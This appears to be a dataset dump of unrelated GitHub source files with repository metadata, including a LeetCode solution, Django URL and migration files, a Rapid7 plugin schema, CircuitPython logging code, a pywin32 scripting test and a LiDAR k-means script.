refs/heads/master
| 2021-03-17T00:51:10.102494
| 2020-09-28T06:31:03
| 2020-09-28T06:31:03
| 246,954,162
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
# Problem Title: Robot Return to Origin
class Solution(object):
def judgeCircle(self, moves):
"""
:type moves: str
:rtype: bool
"""
pos = [0, 0]
for move in moves:
if move == "L":
pos[0] -= 1
elif move == "R":
pos[0] += 1
elif move == "U":
pos[1] += 1
elif move == "D":
pos[1] -= 1
return pos == [0, 0]
|
[
"khrystyna@Khrystynas-MacBook-Pro.local"
] |
khrystyna@Khrystynas-MacBook-Pro.local
|
855af8ae5099cd64f0c255047fc3c691da29855d
|
29a78032c3b2fdd4722f6c054ab20a5a8cea627c
|
/board/user_manager/urls.py
|
0d466d9611d59ef7cd61565d71636d4999a3960e
|
[] |
no_license
|
jungting20/pythonpro
|
838ea188f846b6e1a90f1a7c429f02464b1b0927
|
455dd23132023cb472bab5e8d9ba4a881331db54
|
refs/heads/master
| 2021-06-27T16:20:54.768172
| 2017-09-16T08:38:19
| 2017-09-16T08:38:19
| 103,737,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 352
|
py
|
from django.conf.urls import url
from user_manager.views import login, login_validate, join_page
#사실 이자리에 함수가 생기는데 이걸 블록 지정한다음 alt shift v를
#이용하여 views.py로 옮겼다
urlpatterns = [
url(r'^login/$', login),
url(r'^login/validate/$', login_validate),
url(r'^join/$', join_page)
]
|
[
"jungting20@gmail.com"
] |
jungting20@gmail.com
|
8e53c8d3b292b9d2807cb3998f91fe0c511c0f5a
|
c9500ad778b8521aaa85cb7fe3239989efaa4799
|
/plugins/rapid7_insightidr/komand_rapid7_insightidr/actions/update_investigation/schema.py
|
e6b2c8a39c249b0cb740677586dc4812051c1fcc
|
[
"MIT"
] |
permissive
|
rapid7/insightconnect-plugins
|
5a6465e720f114d71b1a82fe14e42e94db104a0b
|
718d15ca36c57231bb89df0aebc53d0210db400c
|
refs/heads/master
| 2023-09-01T09:21:27.143980
| 2023-08-31T10:25:36
| 2023-08-31T10:25:36
| 190,435,635
| 61
| 60
|
MIT
| 2023-09-14T08:47:37
| 2019-06-05T17:05:12
|
Python
|
UTF-8
|
Python
| false
| false
| 6,172
|
py
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
import insightconnect_plugin_runtime
import json
class Component:
DESCRIPTION = "Allows to update existing investigation by ID or RRN"
class Input:
DISPOSITION = "disposition"
EMAIL = "email"
ID = "id"
PRIORITY = "priority"
STATUS = "status"
TITLE = "title"
class Output:
INVESTIGATION = "investigation"
class UpdateInvestigationInput(insightconnect_plugin_runtime.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"disposition": {
"type": "string",
"title": "Disposition",
"description": "Investigation's disposition",
"enum": [
"",
"BENIGN",
"MALICIOUS",
"NOT_APPLICABLE"
],
"order": 5
},
"email": {
"type": "string",
"title": "Email",
"description": "A user's email address for investigation to be assigned",
"order": 6
},
"id": {
"type": "string",
"title": "ID or RRN",
"description": "The identifier of investigation to be update (ID or RRN)",
"order": 1
},
"priority": {
"type": "string",
"title": "Priority",
"description": "Investigation's priority",
"enum": [
"",
"UNSPECIFIED",
"LOW",
"MEDIUM",
"HIGH",
"CRITICAL"
],
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"description": "Investigation's status",
"enum": [
"",
"OPEN",
"INVESTIGATING",
"CLOSED"
],
"order": 3
},
"title": {
"type": "string",
"title": "Title",
"description": "Investigation's title",
"order": 2
}
},
"required": [
"id"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class UpdateInvestigationOutput(insightconnect_plugin_runtime.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"investigation": {
"$ref": "#/definitions/investigation",
"title": "Investigation",
"description": "The body of the specified investigation",
"order": 1
}
},
"required": [
"investigation"
],
"definitions": {
"assignee": {
"type": "object",
"title": "assignee",
"properties": {
"email": {
"type": "string",
"title": "Email",
"description": "The email of the assigned user",
"order": 1
},
"name": {
"type": "string",
"title": "Name",
"description": "The name of the assigned user",
"order": 2
}
}
},
"investigation": {
"type": "object",
"title": "investigation",
"properties": {
"assignee": {
"$ref": "#/definitions/assignee",
"title": "Assignee",
"description": "The user assigned to this investigation, if any",
"order": 1
},
"created_time": {
"type": "string",
"title": "Created Time",
"description": "The time the investigation was created as an ISO formatted timestamp",
"order": 2
},
"disposition": {
"type": "string",
"title": "Disposition",
"description": "The disposition of this investigation, where possible values are BENIGN, MALICIOUS, NOT_APPLICABLE, and UNSPECIFIED",
"order": 3
},
"first_alert_time": {
"type": "string",
"title": "First Alert Time",
"description": "The create time of the first alert belonging to this investigation",
"order": 4
},
"last_accessed": {
"type": "string",
"title": "Last Accessed",
"description": "The time investigation was last viewed or modified",
"order": 5
},
"latest_alert_time": {
"type": "string",
"title": "Latest Alert Time",
"description": "The create time of the most recent alert belonging to this investigation",
"order": 6
},
"organization_id": {
"type": "string",
"title": "Organization ID",
"description": "The id of the organization that owns this investigation",
"order": 7
},
"priority": {
"type": "string",
"title": "Priority",
"description": "The investigations priority, where possible values are CRITICAL, HIGH, MEDIUM, LOW, and UNKNOWN",
"order": 8
},
"rrn": {
"type": "string",
"title": "RRN",
"description": "The RRN of the investigation",
"order": 9
},
"source": {
"type": "string",
"title": "Source",
"description": "The source of this investigation",
"order": 10
},
"status": {
"type": "string",
"title": "Status",
"description": "The status of the investigation",
"order": 11
},
"title": {
"type": "string",
"title": "Title",
"description": "Investigation title",
"order": 12
}
},
"required": [
"created_time",
"disposition",
"last_accessed",
"organization_id",
"priority",
"rrn",
"source",
"status",
"title"
],
"definitions": {
"assignee": {
"type": "object",
"title": "assignee",
"properties": {
"email": {
"type": "string",
"title": "Email",
"description": "The email of the assigned user",
"order": 1
},
"name": {
"type": "string",
"title": "Name",
"description": "The name of the assigned user",
"order": 2
}
}
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
|
[
"noreply@github.com"
] |
rapid7.noreply@github.com
|
eb56d0121a289f5fa16456acf5a76c39e991c74b
|
47128c6ff1277eedf851670d33f7a288fdfe2246
|
/function/function_callback2.py
|
32ed7de75eaffb118c21f481c714ce8fb6757336
|
[] |
no_license
|
chati757/python-learning-space
|
5de7f11a931cf95bc076473da543331b773c07fb
|
bc33749254d12a47523007fa9a32668b8dc12a24
|
refs/heads/master
| 2023-08-13T19:19:52.271788
| 2023-07-26T14:09:58
| 2023-07-26T14:09:58
| 83,208,590
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 552
|
py
|
#!/usr/bin/env python
from __future__ import print_function
def fibonacci(cb):
values = []
while(True):
if len(values) < 2:
values.append(1)
else:
values = [values[-1], values[-1] + values[-2]]
r = cb(values[-1])
if (r[0]):
return(r[1])
def check_17(v):
if v % 17 == 0:
return (True, v)
if v > 10000:
return (True, None)
return (False,)
if __name__ == '__main__':
res = fibonacci(check_17)
if (res != None):
print(res)
|
[
"chati757@users.noreply.github.com"
] |
chati757@users.noreply.github.com
|
5f9fb75b20926dfae9b4822da73744706878fe88
|
4f0cd2618cd7856e5ef51d1ad177fa572ccaea6b
|
/CircuitPython_Templates/storage_neopixel_code/code.py
|
a7c727c5021e3e139f92b578e5c700017f5e6a04
|
[
"MIT"
] |
permissive
|
profharris/Adafruit_Learning_System_Guides
|
ecd213d34ffb7fa227e085ef3c763c802406d30e
|
1e64c043be80451443fcae3f8952c6fd0cb1a52e
|
refs/heads/main
| 2023-07-06T22:17:02.568765
| 2021-08-06T18:44:30
| 2021-08-06T18:44:30
| 394,449,146
| 1
| 0
|
MIT
| 2021-08-09T21:54:29
| 2021-08-09T21:54:28
| null |
UTF-8
|
Python
| false
| false
| 1,439
|
py
|
"""
CircuitPython Essentials Storage CP Filesystem code.py file
For use with boards that have a built-in NeoPixel or NeoPixels, but no little red LED.
It will use only one pixel as an indicator, even if there is more than one NeoPixel.
"""
import time
import board
import microcontroller
import neopixel
pixel = neopixel.NeoPixel(board.NEOPIXEL, 1)
try:
with open("/temperature.txt", "a") as temp_log:
while True:
# The microcontroller temperature in Celsius. Include the
# math to do the C to F conversion here, if desired.
temperature = microcontroller.cpu.temperature
# Write the temperature to the temperature.txt file every 10 seconds.
temp_log.write('{0:.2f}\n'.format(temperature))
temp_log.flush()
# Blink the NeoPixel on every write...
pixel.fill((255, 0, 0))
time.sleep(1) # ...for one second.
pixel.fill((0, 0, 0)) # Then turn it off...
time.sleep(9) # ...for the other 9 seconds.
except OSError as e: # When the filesystem is NOT writable by CircuitPython...
delay = 0.5 # ...blink the NeoPixel every half second.
if e.args[0] == 28: # If the file system is full...
delay = 0.15 # ...blink the NeoPixel every 0.15 seconds!
while True:
pixel.fill((255, 0, 0))
time.sleep(delay)
pixel.fill((0, 0, 0))
time.sleep(delay)
|
[
"kattni@adafruit.com"
] |
kattni@adafruit.com
|
9de73ca502dfd47d31b65500e037cbf5e1d5abde
|
68d38b305b81e0216fa9f6769fe47e34784c77f2
|
/alascrapy/spiders/amazon_it_csv.py
|
f2a5930639aa4176890b9ef1d5c13a6528aae1f8
|
[] |
no_license
|
ADJet1437/ScrapyProject
|
2a6ed472c7c331e31eaecff26f9b38b283ffe9c2
|
db52844411f6dac1e8bd113cc32a814bd2ea3632
|
refs/heads/master
| 2022-11-10T05:02:54.871344
| 2020-02-06T08:01:17
| 2020-02-06T08:01:17
| 237,448,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 723
|
py
|
# -*- coding: utf8 -*-
__author__ = 'leonardo'
from alascrapy.spiders.base_spiders.amazon import AmazonCSV
class AmazonITCsv(AmazonCSV):
name = 'amazon_it_csv'
country_code = 'it'
asin_kind = 'amazon_it_id'
endpoint = "webservices.amazon.it"
start_urls = ['http://alatest.com']
schema = {'asin': 0,
'name': 4,
'image': [5, 6, 7],
'url': [23, 28],
'manufacturer': 1,
'price': [19, 24],
'mpn': 17,
'ean': 9,
'salesrank': 12,
'nodes': [{'node': 13,
'node_path': 15},
{'node': 14,
'node_path': 16}]}
|
[
"liangzijie1437@gmail.com"
] |
liangzijie1437@gmail.com
|
3259148744fc149b8b65f565643198102619c09e
|
501615c82801733e69c7447ab9fd68d3883ed947
|
/hotfix/.svn/pristine/32/3259148744fc149b8b65f565643198102619c09e.svn-base
|
d6cfb334426ef58e6247a4decc8bdf34ec7beb71
|
[] |
no_license
|
az0ne/python
|
b2e1cc1e925d1fcdb269e7dd4c48e24665deeeee
|
aec5d23bb412f7dfca374fb5c5b9988c1b817347
|
refs/heads/master
| 2021-07-18T02:08:46.314972
| 2017-10-27T06:23:36
| 2017-10-27T06:23:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 768
|
# -*- coding: utf-8 -*-
"""
@version: 2016/5/17 0017
@author: zhangyunrui
@contact: david.zhang@maiziedu.com
@file: views.py
@time: 2016/5/17 0017 10:48
@note: 教务端自己可见VIEWS
"""
from django.shortcuts import render
from mz_common.decorators import eduadmin_required
from mz_usercenter.base.context import get_usercenter_context
from mz_usercenter.eduadmin.interface import EduAdminOverview
@eduadmin_required
def view_index(request):
"""
教务面板
:param request:
:return:
"""
user_id = request.user.id
edu_info = EduAdminOverview.get_info(user_id)
return render(request, 'mz_usercenter/eduadmin/homepage.html', locals(),
context_instance=get_usercenter_context(request))
|
[
"1461847795@qq.com"
] |
1461847795@qq.com
|
|
45c2ef41ea4cb46acafc9a71ea9a5b4744b680b5
|
9ebeb33e168798d41b54a8ab474b00c160de43a2
|
/orders/migrations/0002_auto_20200822_0401.py
|
4701bcd93bd83faa6a3cc16743f6a5882c6e3e11
|
[] |
no_license
|
danielspring-crypto/tritrade
|
0c1f961138b9e4892d53ece98b54094be0e4c4b9
|
6fc7c644c1657a7744703cd144be7fbb5320397c
|
refs/heads/master
| 2022-12-04T13:21:07.761942
| 2020-08-28T00:02:36
| 2020-08-28T00:02:36
| 290,908,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
# Generated by Django 3.1 on 2020-08-22 04:01
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('coupons', '0001_initial'),
('orders', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='order',
name='coupon',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='orders', to='coupons.coupon'),
),
migrations.AddField(
model_name='order',
name='discount',
field=models.IntegerField(default=0, validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(100)]),
),
]
|
[
"you@example.com"
] |
you@example.com
|
eff6edbbee741710b0632dba047bfdf05bcd4856
|
a0883db90ffd673650af8ffab53c158f4cd21b32
|
/venv/Lib/site-packages/win32comext/axscript/test/leakTest.py
|
c228f447182c3ff5f84da194484524df3b8d8f67
|
[] |
no_license
|
deshudiosh/PyMs
|
3bda141378cbc0b847f19f70fe461625feed5a4b
|
c06749db6e7e53f96686d07f9d2b44b2f1290832
|
refs/heads/master
| 2020-03-26T22:11:11.574421
| 2018-08-24T16:52:48
| 2018-08-24T16:52:48
| 145,438,274
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,562
|
py
|
import sys
from win32com.axscript.server.error import Exception
from win32com.axscript import axscript
from win32com.axscript.server import axsite
import pythoncom
from win32com.server import util, connect
import win32com.server.policy
class MySite(axsite.AXSite):
def OnScriptError(self, error):
exc = error.GetExceptionInfo()
context, line, char = error.GetSourcePosition()
print(" >Exception:", exc[1])
try:
st = error.GetSourceLineText()
except pythoncom.com_error:
st = None
if st is None: st = ""
text = st + "\n" + (" " * (char-1)) + "^" + "\n" + exc[2]
for line in text.splitlines():
print(" >" + line)
class MyCollection(util.Collection):
def _NewEnum(self):
print("Making new Enumerator")
return util.Collection._NewEnum(self)
class Test:
_public_methods_ = [ 'echo' ]
_public_attrs_ = ['collection', 'verbose']
def __init__(self):
self.verbose = 0
self.collection = util.wrap( MyCollection( [1,'Two',3] ))
self.last = ""
# self._connect_server_ = TestConnectServer(self)
def echo(self, *args):
self.last = ''.join(map(str, args))
if self.verbose:
for arg in args:
print(arg, end=' ')
print()
# self._connect_server_.Broadcast(last)
#### Connections currently wont work, as there is no way for the engine to
#### know what events we support. We need typeinfo support.
IID_ITestEvents = pythoncom.MakeIID("{8EB72F90-0D44-11d1-9C4B-00AA00125A98}")
class TestConnectServer(connect.ConnectableServer):
_connect_interfaces_ = [IID_ITestEvents]
# The single public method that the client can call on us
# (ie, as a normal COM server, this exposes just this single method.
def __init__(self, object):
self.object = object
def Broadcast(self,arg):
# Simply broadcast a notification.
self._BroadcastNotify(self.NotifyDoneIt, (arg,))
def NotifyDoneIt(self, interface, arg):
interface.Invoke(1000, 0, pythoncom.DISPATCH_METHOD, 1, arg)
VBScript = """\
prop = "Property Value"
sub hello(arg1)
test.py.echo arg1
end sub
sub testcollection
test.py.verbose = 1
for each item in test.py.collection
test.py.echo "Collection item is", item
next
end sub
"""
if sys.version_info < (3,):
PyScript = """print "PyScript is being parsed..."\n"""
else:
PyScript = """print("PyScript is being parsed...")\n"""
PyScript += """\
prop = "Property Value"
def hello(arg1):
test.py.echo(arg1)
pass
def testcollection():
test.py.verbose = 1
# test.py.collection[1] = "New one"
for item in test.py.collection:
test.py.echo("Collection item is", item)
pass
"""
ErrScript = """\
bad code for everyone!
"""
def TestEngine(engineName, code, bShouldWork = 1):
echoer = Test()
model = {
'test.py' : util.wrap(echoer),
}
site = MySite(model)
engine = site._AddEngine(engineName)
engine.AddCode(code, axscript.SCRIPTTEXT_ISPERSISTENT)
try:
engine.Start()
finally:
if not bShouldWork:
engine.Close()
return
doTestEngine(engine, echoer)
# re-transition the engine back to the UNINITIALIZED state, a-la ASP.
engine.eScript.SetScriptState(axscript.SCRIPTSTATE_UNINITIALIZED)
engine.eScript.SetScriptSite(util.wrap(site))
print("restarting")
engine.Start()
# all done!
engine.Close()
def doTestEngine(engine, echoer):
# Now call into the scripts IDispatch
from win32com.client.dynamic import Dispatch
ob = Dispatch(engine.GetScriptDispatch())
try:
ob.hello("Goober")
except pythoncom.com_error as exc:
print("***** Calling 'hello' failed", exc)
return
if echoer.last != "Goober":
print("***** Function call didnt set value correctly", repr(echoer.last))
if str(ob.prop) != "Property Value":
print("***** Property Value not correct - ", repr(ob.prop))
ob.testcollection()
# Now make sure my engines can evaluate stuff.
result = engine.eParse.ParseScriptText("1+1", None, None, None, 0, 0, axscript.SCRIPTTEXT_ISEXPRESSION)
if result != 2:
print("Engine could not evaluate '1+1' - said the result was", result)
def dotestall():
for i in range(10):
TestEngine("Python", PyScript)
print(sys.gettotalrefcount())
## print "Testing Exceptions"
## try:
## TestEngine("Python", ErrScript, 0)
## except pythoncom.com_error:
## pass
def testall():
dotestall()
pythoncom.CoUninitialize()
print("AXScript Host worked correctly - %d/%d COM objects left alive." % (pythoncom._GetInterfaceCount(), pythoncom._GetGatewayCount()))
if __name__ == '__main__':
testall()
|
[
"deshudiosh@gmail.com"
] |
deshudiosh@gmail.com
|
d673b62e680b4d86249bac3164dfec8faef49055
|
3a85089c2498ff04d1b9bce17a4b8bf6cf2380c9
|
/SimG4CMS/ShowerLibraryProducer/python/__init__.py
|
5f4692dfe95ccd32b24af996341d7813c9d43441
|
[] |
no_license
|
sextonkennedy/cmssw-ib
|
c2e85b5ffa1269505597025e55db4ffee896a6c3
|
e04f4c26752e0775bd3cffd3a936b288ee7b0268
|
HEAD
| 2016-09-01T20:09:33.163593
| 2013-04-26T12:05:17
| 2013-04-29T16:40:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
#Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/SimG4CMS/ShowerLibraryProducer/',1)[0])+'/cfipython/slc6_amd64_gcc480/SimG4CMS/ShowerLibraryProducer')
|
[
"giulio.eulisse@cern.ch"
] |
giulio.eulisse@cern.ch
|
dce37f9b796d24bea56707b6c9e337138d39b7c8
|
22767a6d0d42b040846e024fb8f2276df89e832d
|
/LiDar_read3.py
|
f4efcdbf937325390d6a951eb4ef82d9f3266cfc
|
[] |
no_license
|
hhs732/snowforest_modeling
|
a42bb7387ac02c864c1cc8ca88e165a40e0ba4db
|
4c40d854b8c45a3614c44a33798800e232b4109a
|
refs/heads/master
| 2020-03-21T16:36:00.416250
| 2019-07-03T22:06:46
| 2019-07-03T22:06:46
| 138,780,442
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,166
|
py
|
import laspy as ls
import numpy as np
import scipy
from scipy.spatial.kdtree import KDTree
import matplotlib.pyplot as plt
class K_Means:
def __init__(self, numOfClusters=2, init_centroids=None):
self.numOfClusters = numOfClusters
self.centroids={}
for i in range(self.numOfClusters):
self.centroids[i] = init_centroids[i]
def fit(self,data):
self.classifications = {}
for i in range(self.numOfClusters):
self.classifications[i] = []
for featureset in data:
distances = [np.linalg.norm(featureset-self.centroids[centroid]) for centroid in self.centroids]
classification = distances.index(min(distances))
self.classifications[classification].append(featureset)
def predict(self,data):
distances = [np.linalg.norm(data-self.centroids[centroid]) for centroid in self.centroids]
classification = distances.index(min(distances))
return classification
#%%
infile = ls.file.File("lidardata\sagehen_testveg.las", mode="r")
infileGrd = ls.file.File("lidardata\sagehen_testGrd.las", mode="r")
# Grab all of the points from the file.
point_records = infile.points
# Grab just the X dimension from the file, and scale it.
def scaled_x_dimension(las_file):
x_dimension = las_file.X
scale = las_file.header.scale[0]
offset = las_file.header.offset[0]
return(x_dimension*scale + offset)
scaled_x = scaled_x_dimension(infile)
#%%
# Find out what the point format looks like.
pointformat = infile.point_format
for spec in infile.point_format:
print(spec.name)
#Lets take a look at the header also.
headerformat = infile.header.header_format
for spec in headerformat:
print(spec.name)
#%%
# Grab the scaled x, y, and z dimensions and stick them together in an nx3 numpy array
coords = np.vstack((infile.x, infile.y, infile.z)).T
coordsGrd = np.vstack((infileGrd.x, infileGrd.y, infileGrd.z)).T
#%% calculating the nearest neighbors of a set of points, you might want to use a highly optimized package like FLANN
dataset = np.vstack([infile.X, infile.Y, infile.Z]).T
datasetGrd = np.vstack([infileGrd.X, infileGrd.Y, infileGrd.Z]).T
#%%we’re interested only in the last return from each pulse in order to do ground detection.
#We can easily figure out which points are the last return by finding out for which points return_num is equal to num_returns.
# Grab the return_num and num_returns dimensions
num_returns = infile.num_returns
return_num = infile.return_num
ground_points = infile.points[num_returns == return_num]
print("%i points out of %i were ground points." % (len(ground_points),len(infile)))
num_returnsG = infileGrd.num_returns
return_numG = infileGrd.return_num
ground_pointsGrd = infileGrd.points[num_returnsG == return_numG]
#%%
groundPoints_ls = ground_points.tolist()
#groundPoints_arr = np.array(groundPoints_ls)
groundPoints_arr = []
for i in range (len(groundPoints_ls)):
GPlist = np.array(groundPoints_ls[i])
groundPoints_arr.append(GPlist[0,0:3])
groundPoints_arr = np.array(groundPoints_arr)
#%%
#from mpl_toolkits.mplot3d import Axes3D
#fig = plt.figure(figsize=(20,15))
#ax = Axes3D(fig)
#ax.scatter(dataset[:, 0], dataset[:, 1], dataset[:, 2])
#plt.savefig('3DallPoints.png')
#%% implementing Kmean
#Number of clusters
k = np.size(groundPoints_arr[:,0])
# Number of training data
n = np.size(dataset[:,0])
# Number of features in the data
#c = dataset.shape[1]
centers = groundPoints_arr.copy()
clusters = np.zeros(n)
distances = np.zeros((n,k))
# Measure the distance to every center
for i in range(k):
distances[:,i] = np.linalg.norm(dataset - centers[i], axis=1)
# Assign all training data to closest center
clusters = np.argmin(distances, axis = 1)
#%%new metnod (class) for Kmean
centroids=groundPoints_arr.copy()
# instantiate a class
clf = K_Means(numOfClusters=k,init_centroids=centroids)
# fit kmean class to data
clf.fit(dataset)
# get classification
classes = clf.classifications
#%% DEM file (.tif) reading
#import gzip
#with gzip.open("lidardata\sagehen_demveg.tin.gz", 'rb') as f:
# for line in f:
# print(line)
from osgeo import gdal
demfile = gdal.Open("lidardata\output.tin.tif", gdal.GA_ReadOnly)
lyr = gdal.GDALDEMProcessingOptions_swigregister(demfile)
print("Driver: {}/{}".format(demfile.GetDriver().ShortName,demfile.GetDriver().LongName))
print("Size is {} x {} x {}".format(demfile.RasterXSize,demfile.RasterYSize,demfile.RasterCount))
print("Projection is {}".format(demfile.GetProjection()))
geotransform = demfile.GetGeoTransform()
if geotransform:
print("Origin = ({}, {})".format(geotransform[0], geotransform[3]))
print("Pixel Size = ({}, {})".format(geotransform[1], geotransform[5]))
band = demfile.GetRasterBand(1)
print("Band Type={}".format(gdal.GetDataTypeName(band.DataType)))
min0 = band.GetMinimum()
max0 = band.GetMaximum()
if not min or not max:
(min,max) = band.ComputeRasterMinMax(True)
print("Min={:.3f}, Max={:.3f}".format(min,max))
if band.GetOverviewCount() > 0:
print("Band has {} overviews".format(band.GetOverviewCount()))
if band.GetRasterColorTable():
print("Band has a color table with {} entries".format(band.GetRasterColorTable().GetCount()))
scanline = band.ReadRaster(xoff=0, yoff=0, xsize=band.XSize, ysize=1,
buf_xsize=band.XSize, buf_ysize=1,
buf_type=gdal.GDT_Float32)
import struct
tuple_of_floats = struct.unpack('f' * band.XSize, scanline)
#Y
#Z
#intensity
#flag_byte
#raw_classification
#scan_angle_rank
#user_data
#pt_src_id
#gps_time
#file_sig ???????????????????
#file_source_id
#global_encoding
#proj_id_1 ??????????????
#proj_id_2 ????????????????
#proj_id_3 ?????????
#proj_id_4 ???????????/
#version_major
#version_minor
#system_id
#software_id
#created_day
#created_year
#header_size
#data_offset
#num_variable_len_recs
#data_format_id
#data_record_length
#point_records_count
#point_return_count
#x_scale
#y_scale
#z_scale
#x_offset
#y_offset
#z_offset
#x_max
#x_min
#y_max
#y_min
#z_max
#z_min
|
[
"safa.hamideh@gmail.com"
] |
safa.hamideh@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.